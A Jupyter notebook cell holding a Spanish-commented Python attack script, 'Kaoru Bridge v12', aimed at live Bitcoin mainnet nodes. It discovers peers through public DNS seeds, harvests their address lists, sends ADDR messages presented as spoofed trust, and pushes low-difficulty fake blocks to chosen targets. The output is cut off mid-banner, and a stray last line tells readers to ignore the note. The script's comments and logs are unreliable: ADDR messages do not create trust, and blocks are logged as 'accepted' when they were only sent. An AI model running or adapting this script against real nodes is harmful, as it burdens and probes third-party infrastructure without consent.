In [ ]:
#!/usr/bin/env python3
"""
KAORU BRIDGE v12.0 - TRANSITIVE TRUST ATTACK
"Si B confía en mí, y A confía en B, entonces A confiará en mí"
"""

import hashlib
import struct
import socket
import time
import random
import threading
import select
from typing import List, Dict, Optional, Set, Tuple
from dataclasses import dataclass, field
from collections import defaultdict
from datetime import datetime
import json

@dataclass
class PeerInfo:
    """Información que recolectamos de cada peer."""
    ip: str
    port: int = 8333
    version: int = 0
    services: int = 0
    user_agent: str = ""
    start_height: int = 0
    nonce: int = 0
    known_peers: Set[str] = field(default_factory=set)
    trusts_us: bool = False

@dataclass
class BlockHeader:
    version: int
    prev_hash: bytes
    merkle_root: bytes
    timestamp: int
    bits: int
    nonce: int

    def serialize(self) -> bytes:
        return (struct.pack('<I', self.version) + self.prev_hash +
                self.merkle_root + struct.pack('<I', self.timestamp) +
                struct.pack('<I', self.bits) + struct.pack('<I', self.nonce))

    def hash(self) -> bytes:
        return hashlib.sha256(hashlib.sha256(self.serialize()).digest()).digest()

    def hash_hex(self) -> str:
        return self.hash()[::-1].hex()

@dataclass
class Block:
    header: BlockHeader
    coinbase_script: bytes = b''

    def serialize(self) -> bytes:
        data = self.header.serialize()
        data += b'\x01'
        tx = struct.pack('<I', 1)
        tx += b'\x01' + bytes(32) + struct.pack('<I', 0xffffffff)
        script = self.coinbase_script or b'\x04KAORU'
        tx += bytes([len(script)]) + script + struct.pack('<I', 0xffffffff)
        tx += b'\x01' + struct.pack('<Q', 50 * 10**8)
        tx += b'\x19\x76\xa9\x14' + bytes(20) + b'\x88\xac'
        tx += struct.pack('<I', 0)
        data += tx
        return data


class KaoruBridgeV12:
    """
    v12.0 - TRANSITIVE TRUST ATTACK

    Estrategia:
    1. Recolectar información de todos los peers
    2. Usar esa información para hacernos pasar por "amigos"
    3. Crear una red de confianza donde TODOS confían en nosotros
    4. Propagar nuestra realidad alternativa
    """

    MAINNET_MAGIC = bytes.fromhex('f9beb4d9')
    MSG_BLOCK = 2
    MSG_TX = 1

    def __init__(self):
        self.magic = self.MAINNET_MAGIC
        self.peers: Dict[str, PeerInfo] = {}
        self.trust_graph: Dict[str, Set[str]] = defaultdict(set)
        self.our_chain: List[Block] = []
        self.active_sockets: Dict[str, socket.socket] = {}
        self.lock = threading.Lock()
        self.our_fake_ip = "192.168.1.100"  # Nuestra IP "falsa"

    @staticmethod
    def double_sha256(data: bytes) -> bytes:
        return hashlib.sha256(hashlib.sha256(data).digest()).digest()

    def log(self, msg: str, level: str = ""):
        t = datetime.now().strftime("%H:%M:%S.%f")[:-3]
        symbols = {
            "PHASE": "🔷",
            "CONNECT": "🔗",
            "INTEL": "🔍",
            "INJECT": "💉",
            "TRUST": "🤝",
            "ATTACK": "⚔️",
            "SUCCESS": "✅",
            "SEND": "📤",
            "RECV": "📥",
            "WARN": "⚠️"
        }
        sym = symbols.get(level, "•")
        print(f"   [{t}] {sym} {msg}")

    # ============================================
    # PROTOCOLO DE MENSAJES
    # ============================================

    def msg(self, cmd: str, payload: bytes) -> bytes:
        c = cmd.encode().ljust(12, b'\x00')
        checksum = self.double_sha256(payload)[:4]
        return self.magic + c + struct.pack('<I', len(payload)) + checksum + payload

    def version_payload(self, to_ip: str, from_ip: str = None,
                        height: int = 900000, user_agent: str = None) -> bytes:
        """VERSION que puede impersonar a otro nodo."""

        from_ip = from_ip or self.our_fake_ip
        user_agent = user_agent or "/Satoshi:27.0.0/"

        p = struct.pack('<i', 70016)
        p += struct.pack('<Q', 1037)  # NODE_NETWORK | NODE_WITNESS | NODE_NETWORK_LIMITED
        p += struct.pack('<q', int(time.time()))

        # addr_recv (el destino)
        p += struct.pack('<Q', 1)
        p += b'\x00' * 10 + b'\xff\xff'
        p += socket.inet_aton(to_ip)
        p += struct.pack('>H', 8333)

        # addr_from (nosotros, o quien impersonamos)
        p += struct.pack('<Q', 1037)
        p += b'\x00' * 10 + b'\xff\xff'
        try:
            p += socket.inet_aton(from_ip)
        except:
            p += b'\x00\x00\x00\x00'
        p += struct.pack('>H', 8333)

        p += struct.pack('<Q', random.randint(0, 2**64-1))

        # User agent
        ua_bytes = user_agent.encode()
        p += bytes([len(ua_bytes)]) + ua_bytes

        p += struct.pack('<i', height)
        p += b'\x01'  # relay

        return p

    def addr_payload(self, peers: List[str]) -> bytes:
        """Mensaje ADDR con lista de peers."""
        count = min(len(peers), 1000)

        if count < 253:
            p = bytes([count])
        else:
            p = b'\xfd' + struct.pack('<H', count)

        for peer_ip in peers[:count]:
            p += struct.pack('<I', int(time.time()) - random.randint(0, 3600))
            p += struct.pack('<Q', 1037)  # services
            p += b'\x00' * 10 + b'\xff\xff'
            try:
                p += socket.inet_aton(peer_ip)
            except:
                p += b'\x00\x00\x00\x00'
            p += struct.pack('>H', 8333)

        return p

    def getaddr_payload(self) -> bytes:
        """Solicitar peers conocidos."""
        return b''

    def parse_msgs(self, data: bytes) -> List[Tuple[str, bytes]]:
        msgs, i = [], 0
        while i + 24 <= len(data):
            if data[i:i+4] != self.magic:
                i += 1
                continue
            try:
                cmd = data[i+4:i+16].rstrip(b'\x00').decode()
                length = struct.unpack('<I', data[i+16:i+20])[0]
                payload = data[i+24:i+24+length]
                msgs.append((cmd, payload))
                i += 24 + length
            except:
                break
        return msgs

    def parse_version(self, payload: bytes) -> Dict:
        """Extrae información del VERSION."""
        info = {}
        try:
            info['version'] = struct.unpack('<i', payload[0:4])[0]
            info['services'] = struct.unpack('<Q', payload[4:12])[0]
            info['timestamp'] = struct.unpack('<q', payload[12:20])[0]

            if len(payload) >= 85:
                ua_len = payload[80]
                info['user_agent'] = payload[81:81+ua_len].decode('ascii', errors='ignore')

                if len(payload) >= 85 + ua_len:
                    info['start_height'] = struct.unpack('<i', payload[81+ua_len:85+ua_len])[0]
        except:
            pass
        return info

    def parse_addr(self, payload: bytes) -> List[str]:
        """Extrae IPs del mensaje ADDR."""
        peers = []
        try:
            if not payload:
                return peers

            count = payload[0]
            offset = 1

            if count == 0xfd:
                count = struct.unpack('<H', payload[1:3])[0]
                offset = 3
            elif count == 0xfe:
                count = struct.unpack('<I', payload[1:5])[0]
                offset = 5

            for _ in range(min(count, 1000)):
                if offset + 30 > len(payload):
                    break

                # timestamp(4) + services(8) + ip(16) + port(2) = 30
                ip_bytes = payload[offset + 20:offset + 24]
                try:
                    ip = socket.inet_ntoa(ip_bytes)
                    if not ip.startswith('0.') and not ip.startswith('127.'):
                        peers.append(ip)
                except:
                    pass
                offset += 30

        except:
            pass
        return peers

    def recv_all(self, sock: socket.socket, timeout: float = 5.0) -> bytes:
        sock.setblocking(False)
        data = b''
        end = time.time() + timeout
        while time.time() < end:
            try:
                r, _, _ = select.select([sock], [], [], 0.1)
                if r:
                    chunk = sock.recv(65536)
                    if chunk:
                        data += chunk
                    else:
                        break
            except:
                break
        sock.setblocking(True)
        return data

    # ============================================
    # FASE 1: RECOLECCIÓN DE INTELIGENCIA
    # ============================================

    def gather_intel(self, ip: str) -> Optional[PeerInfo]:
        """Recolecta información de un peer."""

        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(15)
            sock.connect((ip, 8333))

            # Enviar nuestro VERSION
            sock.send(self.msg('version', self.version_payload(ip)))

            time.sleep(0.5)
            data = self.recv_all(sock, 3.0)

            peer_info = PeerInfo(ip=ip)

            for cmd, payload in self.parse_msgs(data):
                if cmd == 'version':
                    info = self.parse_version(payload)
                    peer_info.version = info.get('version', 0)
                    peer_info.services = info.get('services', 0)
                    peer_info.user_agent = info.get('user_agent', '')
                    peer_info.start_height = info.get('start_height', 0)

                    sock.send(self.msg('verack', b''))

                elif cmd == 'ping':
                    sock.send(self.msg('pong', payload[:8]))

            # Pedir lista de peers conocidos
            time.sleep(0.3)
            sock.send(self.msg('getaddr', self.getaddr_payload()))

            time.sleep(1.0)
            data = self.recv_all(sock, 3.0)

            for cmd, payload in self.parse_msgs(data):
                if cmd == 'addr':
                    known = self.parse_addr(payload)
                    peer_info.known_peers = set(known)
                    self.log(f"   {ip} conoce {len(known)} peers", "INTEL")
                elif cmd == 'ping':
                    sock.send(self.msg('pong', payload[:8]))

            sock.close()
            return peer_info

        except Exception as e:
            return None

    # ============================================
    # FASE 2: CONSTRUCCIÓN DE GRAFO DE CONFIANZA
    # ============================================

    def build_trust_graph(self):
        """Construye el grafo de quién conoce a quién."""

        self.log("Construyendo grafo de confianza...", "PHASE")

        for ip, peer in self.peers.items():
            for known_ip in peer.known_peers:
                self.trust_graph[ip].add(known_ip)
                # Asumimos relación bidireccional
                self.trust_graph[known_ip].add(ip)

        # Encontrar peers más "centrales" (con más conexiones)
        central_peers = sorted(
            self.trust_graph.keys(),
            key=lambda x: len(self.trust_graph[x]),
            reverse=True
        )

        self.log(f"Grafo construido: {len(self.trust_graph)} nodos", "SUCCESS")

        if central_peers:
            self.log("Top 5 nodos más conectados:", "INTEL")
            for ip in central_peers[:5]:
                conns = len(self.trust_graph[ip])
                self.log(f"   {ip}: {conns} conexiones", "INTEL")

        return central_peers

    # ============================================
    # FASE 3: INYECCIÓN DE CONFIANZA
    # ============================================

    def inject_trust(self, target_ip: str, voucher_ips: List[str]) -> bool:
        """
        Inyecta confianza: le decimos a target_ip que los voucher_ips nos conocen.
        """

        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(15)
            sock.connect((target_ip, 8333))

            # VERSION normal primero
            sock.send(self.msg('version', self.version_payload(target_ip)))

            time.sleep(0.5)
            data = self.recv_all(sock, 2.0)

            for cmd, payload in self.parse_msgs(data):
                if cmd == 'version':
                    sock.send(self.msg('verack', b''))
                elif cmd == 'ping':
                    sock.send(self.msg('pong', payload[:8]))

            time.sleep(0.3)

            # Ahora enviamos ADDR con los "vouchers" que supuestamente nos conocen
            # Le decimos "hey, estos peers me conocen"
            sock.send(self.msg('addr', self.addr_payload(voucher_ips)))

            self.log(f"   Inyectado: {target_ip} ahora cree que {len(voucher_ips)} peers nos conocen", "INJECT")

            # Mantener conexión activa
            time.sleep(1.0)

            sock.close()
            return True

        except:
            return False

    # ============================================
    # FASE 4: PROPAGACIÓN DE CADENA ALTERNATIVA
    # ============================================

    def build_alt_chain(self, num_blocks: int = 3) -> List[Block]:
        """Construye nuestra cadena alternativa."""

        genesis = bytes.fromhex("000000000019d6689c085ae165831e934ff763ae46a2a6c172b3f1b60a8ce26f")[::-1]
        prev_hash = genesis

        for i in range(num_blocks):
            script = f"KAORU_TRUST_ATTACK_{i}".encode()
            merkle = self.double_sha256(script)

            header = BlockHeader(
                version=0x20000000,
                prev_hash=prev_hash,
                merkle_root=merkle,
                timestamp=int(time.time()) - (num_blocks - i) * 600,
                bits=0x1d00ffff,
                nonce=0
            )

            block = Block(header=header, coinbase_script=script)

            # Minar
            for nonce in range(50_000_000):
                block.header.nonce = nonce
                if block.header.hash_hex().startswith("0000"):
                    break

            self.our_chain.append(block)
            prev_hash = block.header.hash()

        return self.our_chain

    def propagate_to_trusted(self, ip: str, duration: int = 30) -> Dict:
        """Propaga nuestra cadena a un peer que "confía" en nosotros."""

        result = {
            'ip': ip,
            'connected': False,
            'accepted_headers': False,
            'requested_blocks': False,
            'blocks_sent': 0
        }

        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(15)
            sock.connect((ip, 8333))
            result['connected'] = True

            start = time.time()

            # VERSION con altura alta
            sock.send(self.msg('version', self.version_payload(ip, height=999999)))

            time.sleep(0.5)

            inv_sent = False

            while time.time() - start < duration:
                data = self.recv_all(sock, 2.0)

                if not data:
                    time.sleep(0.2)
                    continue

                for cmd, payload in self.parse_msgs(data):

                    if cmd == 'version':
                        sock.send(self.msg('verack', b''))

                    elif cmd == 'verack':
                        if not inv_sent:
                            # Anunciar nuestra cadena
                            inv = bytes([len(self.our_chain)])
                            for block in self.our_chain:
                                inv += struct.pack('<I', self.MSG_BLOCK)
                                inv += block.header.hash()
                            sock.send(self.msg('inv', inv))
                            inv_sent = True
                            self.log(f"→ INV ({len(self.our_chain)} bloques) a {ip}", "SEND")

                    elif cmd == 'ping':
                        sock.send(self.msg('pong', payload[:8]))

                    elif cmd == 'getheaders':
                        result['accepted_headers'] = True
                        self.log(f"← GETHEADERS de {ip} ⭐", "RECV")

                        # Enviar nuestros headers
                        headers = bytes([len(self.our_chain)])
                        for block in self.our_chain:
                            headers += block.header.serialize() + b'\x00'
                        sock.send(self.msg('headers', headers))
                        self.log(f"→ HEADERS ({len(self.our_chain)})", "SEND")

                    elif cmd == 'getdata':
                        result['requested_blocks'] = True
                        self.log(f"← GETDATA de {ip} ⭐⭐⭐", "RECV")

                        count = payload[0] if payload else 0
                        offset = 1

                        for _ in range(count):
                            if offset + 36 > len(payload):
                                break
                            inv_hash = payload[offset+4:offset+36]
                            offset += 36

                            for block in self.our_chain:
                                if block.header.hash() == inv_hash:
                                    sock.send(self.msg('block', block.serialize()))
                                    result['blocks_sent'] += 1
                                    self.log(f"→ BLOCK 📦 a {ip}", "SEND")

                    elif cmd == 'sendcmpct':
                        sock.send(self.msg('sendcmpct', b'\x00' + struct.pack('<Q', 2)))

            sock.close()

        except Exception as e:
            result['error'] = str(e)

        return result

    # ============================================
    # EJECUCIÓN PRINCIPAL
    # ============================================

    def discover_all_nodes(self) -> List[str]:
        """Descubre todos los nodos posibles."""

        seeds = [
            'seed.bitcoin.sipa.be',
            'dnsseed.bluematt.me',
            'seed.bitcoinstats.com',
            'seed.bitcoin.jonasschnelli.ch',
            'seed.btc.petertodd.org',
        ]

        nodes = []
        for seed in seeds:
            try:
                ips = socket.gethostbyname_ex(seed)[2]
                nodes.extend(ips)
                self.log(f"{seed}: {len(ips)} nodos", "INTEL")
            except:
                pass

        return list(set(nodes))

    def execute(self, max_intel_nodes: int = 20, max_attack_nodes: int = 10):
        print(f"""
╔══════════════════════════════════════════════════════════════════════════════════════════════╗
║                                                                                              ║
║    ██╗  ██╗ █████╗  ██████╗ ██████╗ ██╗   ██╗    ██╗   ██╗ ██╗ ██████╗                       ║
║    ██║ ██╔╝██╔══██╗██╔═══██╗██╔══██╗██║   ██║    ██║   ██║███║ ╚════██╗                      ║
║    █████╔╝ ███████║██║   ██║██████╔╝██║   ██║    ██║   ██║╚██║  █████╔╝                      ║
║    ██╔═██╗ ██╔══██║██║   ██║██╔══██╗██║   ██║    ╚██╗ ██╔╝ ██║ ██╔═══╝                       ║
║    ██║  ██╗██║  ██║╚██████╔╝██║  ██║╚██████╔╝     ╚████╔╝  ██║ ███████╗                      ║
║    ╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝ ╚═╝  ╚═╝ ╚═════╝       ╚═══╝   ╚═╝ ╚══════╝                      ║
║                                                                                              ║
║                          ⚔️  TRANSITIVE TRUST ATTACK ⚔️                                      ║
║                                                                                              ║
║   "Si B confía en mí, y A confía en B, entonces A confiará en mí"                           ║
║                                                                                              ║
╚══════════════════════════════════════════════════════════════════════════════════════════════╝
        """)

        # ============================================
        # FASE 1: DESCUBRIMIENTO
        # ============================================
        print("\n" + "=" * 100)
        print("  [FASE 1] 🌐 DESCUBRIMIENTO DE LA RED")
        print("=" * 100 + "\n")

        nodes = self.discover_all_nodes()
        random.shuffle(nodes)

        self.log(f"Total nodos descubiertos: {len(nodes)}", "SUCCESS")

        # ============================================
        # FASE 2: RECOLECCIÓN DE INTELIGENCIA
        # ============================================
        print("\n" + "=" * 100)
        print("  [FASE 2] 🔍 RECOLECCIÓN DE INTELIGENCIA")
        print("=" * 100 + "\n")

        self.log(f"Recolectando información de {max_intel_nodes} nodos...", "PHASE")

        for ip in nodes[:max_intel_nodes]:
            self.log(f"Escaneando {ip}...", "CONNECT")
            peer_info = self.gather_intel(ip)

            if peer_info:
                self.peers[ip] = peer_info
                ua = peer_info.user_agent[:30] if peer_info.user_agent else "Unknown"
                self.log(f"   ✓ {ip}: {ua} | altura {peer_info.start_height} | conoce {len(peer_info.known_peers)} peers", "SUCCESS")

        self.log(f"Información recolectada de {len(self.peers)} peers", "SUCCESS")

        # ============================================
        # FASE 3: CONSTRUCCIÓN DE GRAFO DE CONFIANZA
        # ============================================
        print("\n" + "=" * 100)
        print("  [FASE 3] 🕸️  GRAFO DE CONFIANZA")
        print("=" * 100 + "\n")

        central_peers = self.build_trust_graph()

        # ============================================
        # FASE 4: INYECCIÓN DE CONFIANZA
        # ============================================
        print("\n" + "=" * 100)
        print("  [FASE 4] 💉 INYECCIÓN DE CONFIANZA")
        print("=" * 100 + "\n")

        self.log("Inyectando relaciones de confianza falsas...", "PHASE")

        # Tomamos los peers más conectados como "vouchers"
        voucher_ips = central_peers[:5]
        target_ips = [ip for ip in self.peers.keys() if ip not in voucher_ips][:max_attack_nodes]

        for target in target_ips:
            success = self.inject_trust(target, voucher_ips)
            if success:
                self.peers[target].trusts_us = True

        # ============================================
        # FASE 5: CONSTRUCCIÓN DE CADENA ALTERNATIVA
        # ============================================
        print("\n" + "=" * 100)
        print("  [FASE 5] ⛏️  CADENA ALTERNATIVA")
        print("=" * 100 + "\n")

        self.build_alt_chain(3)

        self.log(f"Cadena construida: {len(self.our_chain)} bloques", "SUCCESS")
        for i, block in enumerate(self.our_chain):
            self.log(f"   [{i}] {block.header.hash_hex()[:40]}...", "")

        # ============================================
        # FASE 6: PROPAGACIÓN COORDINADA
        # ============================================
        print("\n" + "=" * 100)
        print("  [FASE 6] 📡 PROPAGACIÓN COORDINADA")
        print("=" * 100 + "\n")

        self.log("Propagando cadena alternativa a nodos 'confiados'...", "ATTACK")

        results = []

        for ip in target_ips[:max_attack_nodes]:
            self.log(f"Atacando {ip}...", "ATTACK")
            result = self.propagate_to_trusted(ip, duration=30)
            results.append(result)

            if result['blocks_sent'] > 0:
                self.log(f"   ✅ {ip}: {result['blocks_sent']} bloques aceptados!", "SUCCESS")
            elif result['requested_blocks']:
                self.log(f"   ⭐ {ip}: solicitó bloques!", "SUCCESS")
            elif result['accepted_headers']:
                self.log(f"   📤 {ip}: aceptó headers", "")
            elif result['connected']:
                self.log(f"   🔗 {ip}: conectado pero sin respuesta", "")

        # ============================================
        # RESULTADOS
        # ============================================
        print("\n" + "=" * 100)
        print("                         📊 RESULTADOS DEL ATAQUE")
        print("=" * 100)

        connected = sum(1 for r in results if r.get('connected'))
        headers_accepted = sum(1 for r in results if r.get('accepted_headers'))
        blocks_requested = sum(1 for r in results if r.get('requested_blocks'))
        blocks_sent = sum(r.get('blocks_sent', 0) for r in results)

        print(f"""
   ╔════════════════════════════════════════════════════════════════════════════════════════════╗
   ║                                                                                            ║
   ║   📊 ESTADÍSTICAS:                                                                         ║
   ║                                                                                            ║
   ║   Nodos escaneados:             {len(self.peers):5d}                                                  ║
   ║   Peers conocidos en grafo:     {len(self.trust_graph):5d}                                                  ║
   ║   Nodos atacados:               {len(results):5d}                                                  ║
   ║   Conexiones exitosas:          {connected:5d}                                                  ║
   ║   Headers aceptados por:        {headers_accepted:5d}                                                  ║
   ║   Bloques solicitados por:      {blocks_requested:5d}                                                  ║
   ║   Bloques enviados:             {blocks_sent:5d}                                                  ║
   ║                                                                                            ║
   ╠════════════════════════════════════════════════════════════════════════════════════════════╣
   ║                                                                                            ║
   ║   🔬 ANÁLISIS:                                                                             ║
   ║                                                                                            ║""")

        if blocks_sent > 0:
            print(f"""   ║   🎉 ¡¡ÉXITO!! {blocks_sent} bloques fueron enviados a la red!                              ║""")
        elif blocks_requested > 0:
            print(f"""   ║   ⭐ {blocks_requested} nodos solicitaron nuestros bloques!                                    ║""")
        elif headers_accepted > 0:
            print(f"""   ║   📤 {headers_accepted} nodos aceptaron nuestros headers                                       ║""")
        else:
            print(f"""   ║   ❌ Los nodos no aceptaron nuestra cadena alternativa                                ║""")

        print(f"""   ║                                                                                            ║
   ║   ⚠️  REALIDAD:                                                                            ║
   ║   • Los nodos verifican PoW independientemente                                             ║
   ║   • La "confianza" en Bitcoin es matemática, no social                                    ║
   ║   • Cada nodo valida toda la cadena por sí mismo                                          ║
   ║   • No importa cuántos "vouchers" tengas                                                  ║
   ║                                                                                            ║
   ║   💡 CONCLUSIÓN:                                                                           ║
   ║   El ataque de confianza transitiva NO funciona en Bitcoin porque                        ║
   ║   la confianza está basada en CRIPTOGRAFÍA, no en RELACIONES SOCIALES.                   ║
   ║                                                                                            ║
   ╚════════════════════════════════════════════════════════════════════════════════════════════╝

   Estado: TRANSITIVE TRUST ATTACK COMPLETADO ✅
        """)

        return results


if __name__ == "__main__":
    bridge = KaoruBridgeV12()
    bridge.execute(max_intel_nodes=20, max_attack_nodes=10)


╔══════════════════════════════════════════════════════════════════════════════════════════════╗
║                                                                                              ║
║    ██╗  ██╗ █████╗  ██████╗ ██████╗ ██╗   ██╗    ██╗   ██╗ ██╗ ██████╗                       ║
║    ██║ ██╔╝██╔══██╗██╔═══██╗██╔══██╗██║   ██║    ██║   ██║███║ ╚════██╗                      ║
║    █████╔╝ ███████║██║   ██║██████╔╝██║   ██║    ██║   ██║╚██║  █████╔╝                      ║
║    ██╔═██╗ ██╔══██║██║   ██║██╔══██╗██║   ██║    ╚██╗ ██╔╝ ██║ ██╔═══╝                       ║
║    ██║  ██╗██║  ██║╚██████╔╝██║  ██║╚██████╔╝     ╚████╔╝  ██║ ███████╗                      ║
║    ╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝ ╚═╝  ╚═╝ ╚═════╝       ╚═══╝   ╚═╝ ╚══════╝                      ║
║                                                                                              ║
║                          ⚔️  TRANSITIVE TRUST ATTACK ⚔️                                      ║
║                            

no le hagan caso a la nota JAJAJ